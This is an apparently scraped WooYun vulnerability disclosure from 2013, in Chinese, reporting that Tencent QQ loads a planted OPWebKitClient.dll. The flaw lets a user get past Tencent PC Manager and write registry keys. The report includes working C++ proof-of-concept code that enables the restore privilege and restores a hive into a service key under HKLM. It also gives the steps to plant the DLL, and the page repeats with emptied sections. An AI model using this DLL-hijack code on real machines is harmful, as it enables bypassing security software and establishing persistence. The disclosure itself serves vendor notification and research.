绕过腾讯电脑安全管家任意写注册表（POC）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-037778

漏洞标题：绕过腾讯电脑安全管家任意写注册表（POC）

漏洞作者： n0bele

提交时间：2013-09-22 17:27

修复时间：2013-12-21 17:28

公开时间：2013-12-21 17:28

漏洞类型：非授权访问/认证绕过

危害等级：低

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-09-22：细节已通知厂商并且等待厂商处理中
2013-09-24：厂商已经确认，细节仅向厂商公开
2013-09-27：细节向第三方安全合作伙伴开放
2013-11-18：细节向核心白帽子及相关领域专家公开
2013-11-28：细节向普通白帽子公开
2013-12-08：细节向实习白帽子公开
2013-12-21：细节向公众公开

简要描述：

腾讯觉得当前目录下dll hijack没啥用，那我来测试下看看

详细说明：

几乎所有腾讯出品的软件都可以dll hijack,为了说明其影响我选用了安装量最多的QQ来劫持。按照他们得话讲这叫没校验:)
上次腾讯的人说任意加载驱动POC无效，他们已经防dll注射了，那么dll hijack你们没防效果也是一样的。代码还是一样的代码。
1.首先我选个dll来劫持，就C:\Program Files\Tencent\QQ\Bin\OPWebKitClient.dll吧，这个dll在登陆QQ后点击系统设置触发.
2.拷贝一份原OPWebKitClient.dll导出表到我的hijack.dll,我的hijack代码如下:

BOOL EnableDebugPriv(LPCTSTR lpName)
{
	BOOL bRet = FALSE;
	HANDLE hToken = NULL;
	TOKEN_PRIVILEGES tp;
	LUID luid;
	do
	{
		if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,&hToken))
			break;
		if(!LookupPrivilegeValue(NULL,lpName,&luid))
			break;
		tp.PrivilegeCount = 1;
		tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
		tp.Privileges[0].Luid = luid;
		bRet = AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
	}
	while(FALSE);
	
	if(hToken != NULL)
		CloseHandle(hToken);
	return bRet;
}
BOOL RestoreReg(HKEY hKey,LPCTSTR lpSubKey,TCHAR szFilePath[MAX_PATH])
{
	BOOL bRet = FALSE;
	HKEY hCur = NULL;
	do
	{
		if(!EnableDebugPriv(SE_RESTORE_NAME))
			break;
		if(RegOpenKeyEx(hKey,lpSubKey,NULL,KEY_ALL_ACCESS,&hCur) != ERROR_SUCCESS &&
			RegCreateKey(hKey,lpSubKey,&hCur) != ERROR_SUCCESS)
			break;
		if(RegRestoreKey(hCur,szFilePath,REG_FORCE_RESTORE) != ERROR_SUCCESS)
			bRet = TRUE;
	}
	while(FALSE);
	if(hCur)
		RegCloseKey(hCur);
	return bRet;
}
BOOL CDllHijackApp::InitInstance()
{
	CWinApp::InitInstance();
	RestoreReg(HKEY_LOCAL_MACHINE,L"SYSTEM\\CurrentControlSet\\Services\\poc",L"C:\\poc.hiv");
	return TRUE;
}

将我的hijack.dll命名为OPWebKitClient.dll,覆盖到C:\Program Files\Tencent\QQ\Bin\

漏洞证明：

成功写入注册表

修复方案：

他们更懂

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2013-09-24 14:31

厂商回复：

感谢反馈，问题已确认，目前已在处理中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-037778

漏洞标题：绕过腾讯电脑安全管家任意写注册表（POC）

相关厂商：腾讯

漏洞作者： n0bele

提交时间：2013-09-22 17:27

修复时间：2013-12-21 17:28

公开时间：2013-12-21 17:28

漏洞类型：非授权访问/认证绕过

危害等级：低

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-037778

漏洞标题：绕过腾讯电脑安全管家任意写注册表（POC）

相关厂商：腾讯

漏洞作者： n0bele

提交时间：2013-09-22 17:27

修复时间：2013-12-21 17:28

公开时间：2013-12-21 17:28

漏洞类型：非授权访问/认证绕过

危害等级：低

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-037778"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 n0bele@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：